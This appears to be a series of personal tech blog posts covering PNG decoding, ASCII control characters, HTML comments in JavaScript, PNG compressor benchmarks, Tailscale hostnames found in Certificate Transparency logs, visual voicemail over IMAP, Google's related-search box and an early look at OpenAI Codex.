        <div class="chunk chunk-IDAT chunk-important">
            <div class="chunk-top"><div class="chunk-header">Image data</div> This contains the compressed image data.</div>
            <div class="length"><span class="chunk-label">Length</span><span><span class="chunk-bytes"> 00 00 F5 51</span> = 62801 bytes long</span></div>
            <div class="type"><span class="chunk-label">Type</span><span><span class="chunk-bytes"> 49 44 41 54</span> = IDAT</span></div>
            <div class="type"><span class="chunk-label">Data</span><span>... (the compressed and filtered bytes of the image)</span></div>
            <div class="crc"><span class="chunk-label">CRC</span><span class="chunk-bytes"> BF EB 1B 15</span></div>
        </div>
        <div class="chunk chunk-tEXt chunk-extra">
            <div class="chunk-top"><div class="chunk-header">Text</div> This can store arbitrary tagged textual data about the image.</div>
            <div class="length"><span class="chunk-label">Length</span><span><span class="chunk-bytes"> 00 00 00 27</span> = 39 bytes long</span></div>
            <div class="type"><span class="chunk-label">Type</span><span><span class="chunk-bytes"> 74 45 58 74</span> = tEXt</span></div>
            <div class="type"><span class="chunk-label">Data</span><span><span class="chunk-bytes"> 46 69 6C 65 00 2F 68 6F 6D 65 2F 73 6D 69 74 2F 50 69 63 74 75 72 65 73 2F 69 63 6F 6E 33 2F 33 64 2E 62 6C 65 6E 64</span> = key: "File", value: "/home/smit/Pictures/icon3/3d.blend"</span></div>
            <div class="crc"><span class="chunk-label">CRC</span><span class="chunk-bytes"> 88 DA 55 E7</span></div>
        </div>
        <div class="chunk chunk-tEXt chunk-extra">
            <div class="chunk-top"><div class="chunk-header">Text</div> This can store arbitrary tagged textual data about the image.</div>
            <div class="length"><span class="chunk-label">Length</span><span><span class="chunk-bytes"> 00 00 00 13</span> = 19 bytes long</span></div>
            <div class="type"><span class="chunk-label">Type</span><span><span class="chunk-bytes"> 74 45 58 74</span> = tEXt</span></div>
            <div class="type"><span class="chunk-label">Data</span><span><span class="chunk-bytes"> 52 65 6E 64 65 72 54 69 6D 65 00 30 30 3A 31 32 2E 31 35</span> = key: "RenderTime", value: "00:12.15"</span></div>
            <div class="crc"><span class="chunk-label">CRC</span><span class="chunk-bytes"> 5E 2F 7A B4</span></div>
        </div>
        <div class="chunk chunk-important">
            <div class="chunk-top"><div class="chunk-header">Trailer</div> This empty chunk indicates the end of the PNG file.</div>
            <div class="length"><span class="chunk-label">Length</span><span><span class="chunk-bytes">00 00 00 00</span> = 0 bytes long</span></div>
            <div class="type"><span class="chunk-label">Type</span><span><span class="chunk-bytes">49 45 4E 44</span> = IEND</span></div>
            <div class="crc"><span class="chunk-label">CRC</span><span class="chunk-bytes">AE 42 60 82</span></div>
        </div>
    </div>
</div>
<div>
    <h2>Extracting the image data</h2>
    <p>We take all of the <abbr title="Image DATa"><code>IDAT</code></abbr> chunks and concatenate them together. In this image, there is only one <code>IDAT</code> chunk, but some images have multiple IDAT chunks whose contents get concatenated together by the PNG decoder. This is so streaming encoders <a href="https://stackoverflow.com/a/29517059/10113238">don't need to know the total data length up front</a>, since the data length is at the beginning of each chunk. Multiple IDAT chunks are also needed when the image data is longer than the largest possible chunk size (2<sup>31</sup> − 1 bytes). Here's what we get if we treat the compressed data as raw image data:</p>
    <img src="https://smitop.com/fmat/png/idat-raw.png" width="256" height="256" loading="lazy" alt="Random noise on the top third, with the rest black." />
    <p>It looks like random noise, and that means that the compression algorithm did a good job. Compressed data should look higher-entropy than the lower-entropy data it is encoding. Also, it's less than a third of the height of the actual image: that's some good compression!</p>
</div>
<div>
    <h2>Decompressing</h2>
    <p>The most important chunk is the <code>IDAT</code> chunk, which contains the actual image data. To get the filtered image data, we concatenate the data in the <code>IDAT</code> chunks, and decompress it using zlib. There is no image-specific compression mechanism in play here: just normal zlib compression.</p>
    <img src="https://smitop.com/fmat/png/idat.png" width="256" height="256" loading="lazy" alt="The example image, increasingly skewed to right from top to bottom. It is mostly black and white, with pixels of intense color scattered throughout." />
    <p>Aside from the colors looking all wrong, the image also appears to be skewed horizontally. This is because each line of the image has a filter as the first byte. Filters don't directly reduce the image size, but get it into a form that is more compressible by zlib. I <a href="https://observablehq.com/@smitop/png-filters">have written about PNG filters before</a>.</p>
</div>
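<div>
    <p>As a rough sketch of just these two steps (pulling out the <code>IDAT</code> data and inflating it, not the full decoder), here's how they can be done in Python with only the standard library; the function name is mine:</p>
    <pre>
import struct, zlib

def png_filtered_data(path):
    with open(path, "rb") as f:
        data = f.read()
    assert data[:8] == b"\x89PNG\r\n\x1a\n"   # the PNG signature
    pos, idat = 8, b""
    while True:
        length = struct.unpack(">I", data[pos:pos + 4])[0]
        ctype = data[pos + 4:pos + 8]
        if ctype == b"IEND":                  # empty trailer chunk: we're done
            break
        if ctype == b"IDAT":
            # concatenate the data of every IDAT chunk
            idat += data[pos + 8:pos + 8 + length]
        pos += 12 + length                    # 4 (length) + 4 (type) + data + 4 (CRC)
    # the concatenated IDAT data is an ordinary zlib stream of filtered scanlines
    return zlib.decompress(idat)
</pre>
</div>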
<div>
    <h2>Defiltering</h2>
    <p>We take the decompressed data and undo the filter on each line. This gets us the decoded image, the same as the original! Here's the popularity of each filter type:</p>
    <div class="filt-counts">
        <div><span class="filt-label">None</span> <span style="width: 0%" class="filt-amount">0</span></div><div><span class="filt-label">Subtract</span> <span style="width: 8.984375%" class="filt-amount">23</span></div><div><span class="filt-label">Up</span> <span style="width: 30.078125%" class="filt-amount">77</span></div><div><span class="filt-label">Average</span> <span style="width: 52.34375%" class="filt-amount">134</span></div><div><span class="filt-label">Paeth</span> <span style="width: 8.59375%" class="filt-amount">22</span></div>
    </div>
    <img src="https://smitop.com/fmat/png/defiltered.png" alt="The example image" width="256" height="256" loading="lazy" />
</div>
<div>
    <h2>Interlacing</h2>
    <p>PNGs can optionally be <dfn>interlaced</dfn>, which splits the image into 7 different images, each of which covers a non-overlapping area of the image:</p>
    <img src="https://smitop.com/ext/Adam7-mul.svg" alt="Diagram of the 7 passes in an 8x8 area. The first is a single pixel in the top-left, and the seventh is every other row." width="400" height="400" loading="lazy" />
    <p>Each of the 7 images is loaded in sequence, adding more detail to the image as it is loaded. This sequence of images is called <a href="https://en.wikipedia.org/wiki/Adam7_algorithm">Adam7</a>.</p>
    <p>The data for each of the 7 images are stored after each other in the image file. If we take the example image and enable interlacing, here's the raw uncompressed image data:</p>
    <img src="https://smitop.com/fmat/png/inter-idat.png" alt="Same as the earlier skewed letter S, but there are multiple stacked on top of each other. The bottom half has 2, the third above that has 2 more, and above that it increasingly looks like random noise." width="256" height="256" />
    <p>Here are the 7 passes that we can extract from that image data, which look like downscaled versions of the image:</p>
    <div class="inter-passes">
        <!-- in-article text describes these well enough, so set null alt text -->
        <img src="https://smitop.com/fmat/png/inter-1.png" alt="" width="32" height="32" loading="lazy">
        <img src="https://smitop.com/fmat/png/inter-2.png" alt="" width="32" height="32" loading="lazy">
        <img src="https://smitop.com/fmat/png/inter-3.png" alt="" width="64" height="32" loading="lazy">
        <img src="https://smitop.com/fmat/png/inter-4.png" alt="" width="64" height="64" loading="lazy">
        <img src="https://smitop.com/fmat/png/inter-5.png" alt="" width="128" height="64" loading="lazy">
        <img src="https://smitop.com/fmat/png/inter-6.png" alt="" width="128" height="128" loading="lazy">
        <img src="https://smitop.com/fmat/png/inter-7.png" alt="" width="256" height="128" loading="lazy">
    </div>
    <p>Since some of those sub-images are rectangles but the actual image is square, there will be more details horizontally than vertically when loading the image, since horizontal detail is more important than vertical detail for human visual perception.</p>
</div>
<div>
    <h2>Bonus: bugs</h2>
    <p>Here's what you get when you have a bug in the Average filter that causes it to handle overflows incorrectly (the way integer overflow is specified for the Average filter's calculation is a bit different from the other filters):</p>
    <img src="https://smitop.com/pngbug.png" alt="The example image, but it looks glitchy starting a quarter of the way down." width="256" height="256" loading="lazy">
</div>


Writing semantic ASCII


In the ASCII character set (and Unicode, where the first 128 characters are the same as ASCII), there are 32 non-printable control characters. Many of them aren’t very useful in a modern context: Acknowledge, for example, since modern communication protocols handle acknowledgements at a higher level.

But some of those characters are useful! I’m going to call writing ASCII that takes advantage of control characters Semantic ASCII (like Semantic HTML) because it makes it sound cool.

The most useful control characters are File Separator/Group Separator/Record Separator/Unit Separator, which can be used to delimit data in a structured file. Unit Separator is the equivalent of CSV’s comma or TSV’s tab, and Record Separator is the equivalent of a newline. The ASCII way of structuring data works better than CSV/TSV: it can handle newlines/commas/tabs in data without the need for quoting or escaping, and instead of representing a 2D matrix, ASCII can represent a 4D tensor!

For example, to represent data about countries and their political subdivisions, and the populations and founding date of these places we can use these characters (leading whitespace is just for visual clarity here):

Canada
  <GS>38246108
  <GS>1867-07-01
  <GS>
    Newfoundland
      <US>521542
      <US>1949-03-31
    <RS>Ontario
      <US>14826276
      <US>1867-07-01
<FS>United States
  <GS>334262970
  <GS>1776-07-04
  <GS>
    Maine
      <US>1344212
      <US>1820-03-05
    <RS>North Dakota
      <US>762062
      <US>1889-11-02

It would have been great if this format had become the de facto way of storing spreadsheets, instead of CSV, which gets quite complicated to parse correctly when you need to start handling commas and newlines within cells. Alas, CSV is what we are stuck with.
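Parsing the separator-based format really is trivial; here's a minimal sketch (same data layout as the example above, helper names mine):

# File/Group/Record/Unit Separator control characters.
FS, GS, RS, US = "\x1c", "\x1d", "\x1e", "\x1f"

def parse(text):
    # Four levels of nesting, split by the four separators in order.
    return [[[record.split(US) for record in group.split(RS)]
             for group in file.split(GS)]
            for file in text.split(FS)]

countries = ("Canada" + GS + "38246108" + GS + "1867-07-01" + GS
             + "Newfoundland" + US + "521542" + US + "1949-03-31"
             + RS + "Ontario" + US + "14826276" + US + "1867-07-01"
             + FS + "United States" + GS + "334262970" + GS + "1776-07-04" + GS
             + "Maine" + US + "1344212" + US + "1820-03-05"
             + RS + "North Dakota" + US + "762062" + US + "1889-11-02")
print(parse(countries)[0][3])  # Canada's subdivisions, already split into records and units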

Another useful character is Form Feed, which is supposed to function as a page break when the document is printed. It doesn’t get much use today, probably due to poor support, but some older documents use it, including some RFCs and GPL license versions.

More cool characters: Start of Heading, Start of Text, and End of Text can be used as a basic way of specifying headings in a document in pure ASCII, for primitive (and rarely supported) text formatting.

HTML comments work in JavaScript too


Here’s some obscure trivia about JavaScript: you can use HTML comments in JavaScript. Not just in <script> tags: you can use them in included standalone files, and even in Node.js and Deno. Syntax highlighters, on the other hand, do not have great support for this (the only one I’ve seen get it completely right is the one in the Firefox DevTools), so these snippets will show up a bit weirdly on my blog. Here’s what that looks like:

// below statement logs 1
console.log(1); <!-- log 1 -->
<!-- above statement logs 1 -->

This is entirely a historical relic, and using this for anything other than experimentation is a Bad Idea. The original intent was to make it so that browsers without JavaScript support would ignore script blocks that were surrounded with HTML comments, instead of treating them as text (browsers treat unknown elements as <span>s). As such, HTML comments inside JavaScript were ignored. Such code blocks might look like this:

<script>
  <!--
    // browsers without JavaScript support think this is all in a big comment,
    // and so don't render this as plain text
    alert("Hi!");
  -->
</script>

While there are no browsers made in the past two decades that display the contents of script tags (even when JavaScript is disabled), this behavior can’t be removed from browsers since some websites rely on this. Eventually this behavior was added to the ECMAScript spec, as a legacy behavior that should only be implemented in browser-like environments. I’m not sure why Node and Deno support this: maybe V8 doesn’t have any option to disable this?

The spec allows for a lot of interesting comment behavior. We can use <!-- the same as // for a line comment, but --> only works at the start of a line. Unlike actual HTML comments, which are block comments, HTML-in-JS comments are always line comments.

// Logs 1
console.log(1); // Logs 1

<!-- Logs 2
console.log(2); <!-- Logs 2

--> Logs 3
console.log(3);

The reason that --> is only allowed at the start of a line is that otherwise it would break the “goes to” operator (decrement followed by greater than).

Some more useful comment-related trivia I learned is that a shebang (#!) at the beginning of a file is also treated as a comment, even in (modern) web browsers.


Zopfli is *really* good at compressing PNGs


Recently I wondered what PNG compression engine was the best. I had been using pngcrush out of habit, but was there a better compressor out there? As it turns out, yes. Some initial digging revealed that PNGOUT was apparently pretty good. While it was originally created for Windows, there are ports available for other operating systems. Unfortunately, PNGOUT (and those ports) are under a non-free license, and “The source code for these tools is not public. Don’t bother asking.”. So: is PNGOUT the best compression engine? Let’s find out!

Testing the engines

I compared 10 PNG compression engines: zopflipng, pngout, FFmpeg, pngcrush, imagemagick, optipng, oxipng, ImageWorsener, AdvanceCOMP, and pngrewrite. For engines that supported it, I set the compression amount to the highest possible. I also turned off the optimization where you just do nothing if your attempt to compress the image makes it bigger, since that’s a boring optimization that everyone implements anyways. I only measured how much the engines could compress input files: I didn’t measure how long that took. For images that are served a lot, compression that takes a long time is worth it, since you can compress it up-front to get savings over time. Maybe in the future I’ll factor in the speed of performing the compression.
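The test harness essentially just runs each engine and compares file sizes. Here's the flavour of it for the Zopfli case (the paths and the helper are mine; check zopflipng --help before trusting the exact flags):

import os
import subprocess

def zopfli_savings(src, dst="out.png"):
    # zopflipng writes a recompressed copy of src to dst; -y overwrites dst if it exists.
    subprocess.run(["zopflipng", "-y", src, dst], check=True, capture_output=True)
    before, after = os.path.getsize(src), os.path.getsize(dst)
    return (before - after) / before  # fraction shaved off the original size

print(f"{zopfli_savings('test-images/avatar.png'):.1%} smaller")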

I sourced test images from:

In total, this amounted to 336 test images.

The results

I was quite surprised at the results I got once I finished adding support for all engines to my test harness. The best engine, by a long shot, was Zopfli, a compression engine by Google. It only supports compressing images, so you have to use something else to decompress them. They say:

Zopfli Compression Algorithm is a compression library programmed in C to perform very good, but slow, deflate or zlib compression.

And it is indeed very good: it blows all of the other compression engines out of the water. Just look at the comparison table of how each engine does on each image: Zopfli is almost always the best. On average, it can shave 33.4% off of images, while the runner-up, PNGOUT, can only do 17.86%! (yes, some engines indeed make images worse on average, usually due to weird images in the pngsuite being hard to compress):

A bar chart of the compression rates of various engines. zopflipng has the best at -33.40%.

(it was a real pain to get LibreOffice Calc to make that chart, the chart interface is not remotely intuitive)

Of the engines, ImageMagick, and FFmpeg were never the best engine to compress an image. The best pngrewrite, optipng, and oxipng could do is tie for best with Zopfli (and usually they do much worse). ImageWorsener, PNGOUT, pngcrush, and AdvanceCOMP could sometimes beat Zopfli, but are usually only a few percent better, and only occasionally: Zopfli is the best 87% of the time. The images it tends to be a bit worse on are typically “weird” images that are hard to compress.

So Zopfli is really good. You should use it to compress your images! The catch, of course, is that it’s very slow. Running Zopfli on all user-generated content might not be a good idea, but compressing your static images can help save a lot of bandwidth! And you can save bandwidth: all of the (valid) images in the test suite could be further compressed by at least one engine, and there was only one image that Zopfli was unable to shrink further.

Nix

The Nix package manager was quite useful for performing this analysis. nixpkgs had almost all of the engines I needed, already up-to-date. There wasn’t any messing around with dependencies! The one compression engine that nixpkgs didn’t have, pngrewrite, was super simple to add: I just wrote a short expression to tell Nix how to build it, and Nix handled everything else for me. Take a look at the *.nix files in the test harness for more details.

Analyzing the public hostnames of Tailscale users


Getting the data

Browsers have been increasingly pushing for higher HTTPS adoption in recent years. Many browsers now display a “Not secure” indicator for websites that still use HTTP. For the most part, this is a good thing: HTTPS provides better privacy and security for users. However, it presents an issue for internal websites that are always accessed over a secure underlying transport layer anyways. The most common secure transport layer is the loopback address: since the traffic never leaves your computer, there is no risk of someone intercepting it. As such, localhost is special-cased to be treated as a secure origin in Chromium and other browsers.

Another case where the underlying transport layer already provides transport security is when the host is accessed over a virtual private network (VPN) that provides sufficient security. Tailscale is one such VPN solution. When the Tailscale daemon is running, it attempts to set the local DNS server to 100.100.100.100, and handles DNS traffic to that address locally, resolving certain special domains to the CGNAT addresses that are used for identifying hosts.

# querying tailscaled's internal DNS server
$ dig @100.100.100.100 +short pop1.xerus-coho.ts.net
100.96.112.51

# querying public DNS server
$ dig @9.9.9.9 +short pop1.xerus-coho.ts.net
# [no addresses found]

When visiting websites hosted on nodes in one’s Tailscale network (Tailnet) in a browser, they are not treated as a secure origin – even though they are! Tailscale encrypts traffic as it is sent through the network using the public key of the receiving node. But since VPNs are completely transparent to the browser, it just doesn’t know that the underlying transport layer is secure.

Tailscale offers a solution to this problem: the tailscale cert command, which provisions a Let’s Encrypt certificate for your ts.net subsubdomain using a DNS challenge. The Tailscale client asks the Tailscale backend to update the DNS for a subdomain to prove ownership of the domain. The private key and certificate signing request are generated locally, so Tailscale’s servers never see your private key. This provides no real additional security; it only serves to make browsers not display certificate warnings.

All certificates issued by Let’s Encrypt are appended to a public Certificate Transparency log. Certificates are added to a tamper-evident Merkle tree (like a blockchain, except each certificate gets its own block) by certificate authorities after they are issued. Browsers require that certain certificates appear in Certificate Transparency logs, and this includes the ones issued for ts.net subdomains. We can search through these Certificate Transparency logs to find all domains that have certificates issued for them. We can use this to find out what hostnames people are running tailscale cert on! (Tailscale does inform users of this fact when they set up TLS support for a Tailnet.) Keep in mind that this data is biased towards hostnames that people want to create certificates for, so it might not be representative of all hostnames.
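For example, something along these lines pulls the ts.net entries out of crt.sh (this assumes crt.sh's unofficial JSON output, which is heavily rate-limited, so be gentle):

import json
import urllib.request

# %25 is a URL-encoded "%", crt.sh's wildcard character.
url = "https://crt.sh/?q=%25.ts.net&output=json"
with urllib.request.urlopen(url) as resp:
    entries = json.load(resp)

hostnames = set()
for entry in entries:
    # name_value can contain several newline-separated names per certificate
    for name in entry["name_value"].splitlines():
        if name.endswith(".ts.net"):
            hostnames.add(name)
print(len(hostnames), "distinct ts.net hostnames")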

The data

I got all ts.net subdomains listed in certificate transparency logs, and ontologized each of them into a single category. In cases like johnny-surface-laptop, which include multiple categories, I used a category that combines the two: OS+User in this case. I probably have made some mistakes in collating the data. If you want to play with the data, you can grab the spreadsheet as a CSV (or from Kaggle, if for some reason that’s a thing you want).

Interesting results

The data includes the 312 Tailscale users who have used tailscale cert, and a total of 464 hostnames. This means that the average user has 1.49 hostnames exposed using tailscale cert. First-level subdomains of ts.net represent Tailnets, and second-level subdomains are the actual hosts in those Tailnets. The first-level subdomains have random labels, like xerus-coho, to anonymize the Tailnet owner somewhat. The Tailnet with the most hostnames is tailnet-cdb8 with 26, and in second place is corp with 9. corp appears to be used for services internal to Tailscale Inc. It shouldn’t be possible for the Tailnet part of the domain to be corp – it doesn’t fit the allowed name structures, but Tailscale gave themselves the one and only vanity name.1 Here are those hostnames in corp: builds, bradfitz, paintest, tshello, test-builder, tsdev, changelog, bronzong, and pain(?).

Here’s what the most popular categories I assigned are: A pie chart of various hostname categories. Intended usage is 17.9%, Software running is 14.7%, Non-descriptive word is 13.4%, Random characters is 11.4%, Hardware is 8%, Made-up word is 5.4%, Default name is 4.3%, Human-like name is 4.3%, Hosting provider is 3.9%, OS name is 3%, Fictional thing is 2.8%, Hardware+Name is 1.9%, Non-English word is 1.7%, Physical location is 1.7%.

Most hostnames describe how the host is intended to be used. More interesting are the 37% of names that are entirely unrelated to the intended use or hardware. This includes hostnames like:

  • Non-descriptive words: spike, slab, cardinal
  • Made-up words: lois, gimli, thopter
  • Pokémon: mewtwo, mew, bronzong
  • Random characters: nas484e5d, otx82wn9xnzcygap6bsc, o25e62iw8ab88gg8

Using a hostname unrelated to what is happening on the host allows for more flexibility if the use changes in the future. It makes less sense for hosts with a particular use determined at creation time, which can be reimaged or have their VM destroyed if that use isn’t needed anymore. Hostnames reflect whether the host is treated like cattle or like a pet.

Only 14.2% of hostnames have duplicates: 86% of hostnames are unique.

A bar chart. raspberrypi at 11; pihole at 5; brix, monitoring, nuc, pi, pikvm, ubuntu at 3; code, ha, homeassistant, hub, kali, media-nas, nas, nextcloud, octopi, payments, pi4, pihole-1, pihole-2, pop-os, pve at 2

Raspberry Pi related hostnames are surprisingly popular there.

Shared-hostname graph

Two Tailnets have a line between them if they share a hostname: A diagram of various Tailnets, connected together. There are 2 large clusters and many smaller clusters. The biggest cluster is networks with raspberrypi, the second largest is networks with pihole.


  1. More solid evidence for this: a Tailscale employee explicitly confirming this to be the case ↩︎


Your Phone app has an email client


Zawinski’s Law states:

Every program attempts to expand until it can read mail. Those programs which cannot so expand are replaced by ones which can.

This is true of the Phone apps on Android and iOS, both of which have an integrated IMAP client that’s used to display and interact with visual voicemail. My favourite mobile Linux distribution, Plasma Mobile, doesn’t support it yet.

Mobile carriers support forwarding numbers1: when a call isn’t picked up after a certain number of rings, the call is forwarded to another number. This is how voicemail works on mobile phones: on-device voicemail wouldn’t be able to handle calls when the phone is turned off, so if you want to be able to get voicemail without an always-on phone you need to forward calls to an external service. Mobile carriers almost universally provide a voicemail service for their customers that works as such a forwarding number.

Without visual voicemail, voicemail recipients have to check their voicemail by calling a specified number and interacting with the system using the dial pad. SIM cards can store a voicemail number on them, and this number can be changed (although not all operating systems actually provide a mechanism for doing so). Dialer apps on smartphones support holding the 1 key to call this number, eliminating the need to remember it.

Navigating a voicemail system using a dial pad is fairly clunky and annoying. Visual voicemail provides a more convenient way to check one’s voicemail that works in addition to calling in. With visual voicemail, you can interact with your voicemail without needing to call your voicemail number. Visual voicemail is supported by many carriers, although it is common for them to charge an additional fee for the luxury of more convenient and accessible usage. Here’s what it looks like on iOS:

A screenshot of iOS visual voicemail. There are 3 pending voicemails shown. One is selected, and has a sender name, a date, a share button, a transcription of the audio, a play button, a “Speaker” button, a “Call Back” button, and a “Delete” button.

The visual voicemail standard is implemented by the Android Phone app. I think it’s also the standard that iOS uses, but Apple doesn’t make their documentation for this public. Also, my mobile carrier says that their visual voicemail service only works on iOS, so it’s possible that iOS does implement the spec but with some quirks that make it incompatible with Android. Voicemail messages are sent using standard IMAP, the protocol originally designed for accessing emails. When visual voicemail is enabled by the carriers, information about the visual voicemail server is sent using binary SMS messages. The server address is sent as a DNS name, which in practice tends to resolve to a 10.*.*.* IP that can only be accessed over mobile data. Some carriers zero-rate data charges for traffic to their internal IPs.
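The client side of this is ordinary IMAP. Here’s a rough sketch of what a visual voicemail client does once it has the provisioning details, using Python’s standard imaplib. The host, port, and credentials are placeholders – the real values arrive over the carrier’s binary SMS messages:

# Rough sketch of the IMAP side of a visual voicemail client.
# Host and credentials are placeholders; the real ones are delivered by
# the carrier's binary SMS provisioning messages.
import imaplib

conn = imaplib.IMAP4("vvm.internal.example", 143)   # usually a 10.* host
conn.login("15555550123", "pin-from-provisioning")
conn.select("INBOX")

_, data = conn.search(None, "UNSEEN")               # new voicemails
for num in data[0].split():
    _, fetched = conn.fetch(num, "(RFC822)")
    raw_msg = fetched[0][1]                         # full message bytes
    # ...parse with the email module (see the sketch further down)...

conn.logout()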

Metadata about the messages, such as information about the caller, is encoded into headers of the messages transmitted over IMAP. The message itself is an attachment. The spec has a few example messages, but they got a bit mangled when typed into a word processor and converted to a PDF. Here’s Example C, a typical voicemail message, unmangled:

Return-Path: <>
Received: from msuic1 (10.106.145.31) by MIPS.SITE1 (MIPS Email Server) id 45879DD300000196 for 11210@vi.com; Tue, 19 Dec 2006 12:12:09 +0200
subject: voice mail
MIME-Version: 1.0 (Voice Version 2.0)
Message-Id: <31.24.2326006@msu31_24>
Content-Type: Multipart/voice-message; boundary="------------Boundary-00=_90NIQYRXFQQMYJ0CCJD0"
From: 771004@vi.com
To: 771000@vi.com
Content-Duration: 17
Message-Context: voice-message
Date: Tue, 19 Dec 2006 10:12:09 +0000 (UTC)
--------------Boundary-00=_90NIQYRXFQQMYJ0CCJD0
Content-Type: Text/Plain
Content-Transfer-Encoding: 7bit
click on attachment
--------------Boundary-00=_90NIQYRXFQQMYJ0CCJD0
Content-Type: audio/amr
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="vm.amr"
Content-Duration: 17
[message attachment]
--------------Boundary-00=_90NIQYRXFQQMYJ0CCJD0--

In that message, the sender and receiver are both identified by email addresses (771004@vi.com and 771000@vi.com). The local part of each address is that party’s phone number, and the domain is one owned by the carrier. These number emails aren’t just used for visual voicemail: most carriers let you send an email to them, which gets converted into an SMS sent to the receiver.2 For example, you can send an email to [number]@vtext.com to send an SMS to a Verizon phone from the comfort of your email client (and for some reason you have to use vzwpix.com instead if you want to “include an attachment, like a picture or emoji”, because just having one domain for everything and acting differently based on message content would be too hard for Verizon).

The message audio is stored in an .amr file, which is a file format specifically optimized for compressing human speech, and has wide adoption.
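Pulling the interesting fields and the audio attachment out of a message like Example C is straightforward with Python’s standard email module. A sketch, assuming raw_msg holds the raw message bytes from the IMAP fetch above:

# Extract caller, duration, and the AMR audio attachment from a
# visual voicemail message. raw_msg is the raw RFC 822 bytes.
import email

msg = email.message_from_bytes(raw_msg)

print("From:", msg["From"])                        # e.g. 771004@vi.com
print("Duration:", msg["Content-Duration"], "s")

for part in msg.walk():
    if part.get_content_type() == "audio/amr":
        with open(part.get_filename() or "vm.amr", "wb") as f:
            f.write(part.get_payload(decode=True)) # base64 is undone here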

Visual voicemail is a good example of reusing existing, well-tested, protocols when possible, instead of coming up with a new domain-specific protocol. Voicemails fit fairly well onto the model of IMAP, so it makes sense to reuse the IMAP protocol for them. IMAP is a good protocol to use whenever you have data that maps nicely onto the model of an email client.


  1. There are actually multiple types of forwarding that vary under what conditions the call is forwarded. ↩︎

  2. And some, like mine, send a message saying that you need to upgrade to a plan with number email support to be able to view the message. ↩︎

Google's new related search box optimizes for the wrong metric

By · · 3 minute read

When using Google, I sometimes look at a result, then go back to the results page to check another result. When I go back, Google sometimes pops up a box with related searches around the result:

A Google search result for “example - Wiktionary”. Below it is a box with a gray header that says “People also search for”, with 6 search results below it.

It only does this sometimes: it seems to only happen when I’m using a browser in the right half of an A/B test and when there are enough related search suggestions. But the UI for this is terrible. It doesn’t pop up right away, so it looks like I can move my mouse to the result below and click it – but then the related search box appears right as I’m clicking, causing me to accidentally click on a related search. It’s a very annoying experience. The box seems perfectly timed to appear at just the right moment to get me to click it while I’m trying to click the result below it.

I have literally never intentionally clicked on one of the related searches in that box: if I wanted related searches, I could always go to the bottom of the page for them. But I have accidentally clicked on that box so many times. It’s very infuriating.

The worst part of this is that someone at Google is probably looking at the results of their A/B test and thinking “Wow, this new feature is great. Look at how many people are using related searches when they can’t find what they’re looking for!” But most of those uses are just misclicks: it seems that they are optimizing for more searches (and thus more ad views) rather than actually looking at how features are used.

ai

By · · 0 minute read

How good is Codex?

By · · 44 minute read

OpenAI recently released Codex (paper), a large-scale language generation model trained on public programming source code from GitHub. Its most prominent use so far is GitHub Copilot, an extension for VSCode1 that autocompletes code being edited. However, there are many uses for Codex beyond code completion. OpenAI recently ran the OpenAI Codex Challenge, where competitors were tasked with solving various programming tasks and could use Codex to help them. I participated in the challenge and got 75th place2. Due to some overloaded servers during the challenge, many people were unable to actually compete, so that ranking is mostly due to me figuring out the best times to reload to get the challenge to work. After the challenge, OpenAI sent me an invite to try out the Codex model, which I used to do the testing in this post.

In this post, I find that Codex understands the Linux source code, can write simple scripts, can sometimes write commit messages, can write good explanations of code (including a surprisingly good one of red-black trees), can be prompted to make the code it writes more secure, and more.

I’ve used a variety of languages in this post. OpenAI says that Codex has support for “JavaScript, Go, Perl, PHP, Ruby, Swift, TypeScript, SQL, and even Shell”, and in my experience Codex does work quite well for all of those listed. I’ve also seen it write code in other languages, such as C, C++, and Rust, fairly well. Codex’s ability to write in a language is mostly based on how much training data it has seen in that language, so more obscure languages don’t work as well. Some languages are also just easier for the model to work with: I find that, in general, Codex works better with languages that make more things explicit. Codex struggles to write code that passes Rust’s borrow checker, since whether some code passes the borrow checker is a very complex function of the code (especially with non-lexical lifetimes). It is comparatively easy to check whether some code is syntactically valid, and so Codex very rarely writes code that isn’t.

I will evaluate the strengths and weaknesses of Codex, determine what tasks it is well-suited for, and explore the limits of what it can do, along with many potential use-cases. While source code language models still have a long way to go, Codex is already very exciting, and I can’t wait to see applications of it, and how the model itself can be improved.

Overall, I think that Codex’s main strength currently is writing simple pieces of code that don’t require much understanding of any particular niche topic or a deep understanding of the codebase. Codex is able to take code it has seen before, expressed in different ways and languages, and weave it together into new code. But it isn’t yet able to write new algorithms, find clever optimizations, or consistently generate code without logic bugs. Hopefully over time better models will be developed that can exceed the abilities of Codex. There is still a long way to go in the development of source code language models, but Codex is already exciting today.

In this article, the input to the Codex model is bold, and the rest of the code is the output of the model. I also include the model parameters used to generate the output. Note that there is an element of randomness to the model’s generations when the temperature is non-zero, so trying them yourself in those cases will give different results. Also note that in a few cases Codex generates the actual email addresses of other people, which I replaced with [email removed] to avoid spammers. Interestingly, the Copilot extension checks for email addresses and similar information in generated outputs, and discards generations that contain them. Here, the first two lines of this script were provided by me, and the third was generated by Codex.

Model: davinci-codex
Temperature: 0.4
Top P: 1
Frequency penalty: 0
Presence penalty: 0
#!/bin/bash # Say hello! echo "Hello, World!"
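For reference, a parameter block like that corresponds roughly to a call like the following in the OpenAI Python client as it existed at the time. This is a sketch – the API key, max_tokens value, and exact client interface are assumptions on my part:

# Roughly how the parameter blocks in this post map onto an API call.
import openai

openai.api_key = "sk-..."  # placeholder

completion = openai.Completion.create(
    engine="davinci-codex",
    prompt='#!/bin/bash\n# Say hello!\n',
    temperature=0.4,
    top_p=1,
    frequency_penalty=0,
    presence_penalty=0,
    max_tokens=64,
)
print(completion["choices"][0]["text"])   # e.g. 'echo "Hello, World!"'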

The model

There are actually two Codex models currently, davinci-codex and cushman-codex. The cushman-codex model is a smaller version of the davinci-codex model, which runs faster but at the cost of lower-quality results. Despite this, cushman is actually quite competitive with davinci, and I had a hard time finding inputs where cushman did significantly worse than davinci. Often davinci-codex and cushman-codex do the same thing in different ways. GitHub Copilot seems to use a variant of cushman for cases where faster completions are desired (such as autocomplete), and an undocumented “earhart” model when slower completions are acceptable (such as when a user clicks a button to explicitly request completions). Following the naming convention of the current models, where the first letter represents quality, earhart would provide results that are higher quality than davinci. Alas, I am unable to test this.

Various parameters can be used to control how the model generates its output. Tuning these parameters can be quite helpful for getting the desired results. Since Codex is based on GPT-3, the parameters are the same as GPT-3’s.

Temperature/top-P

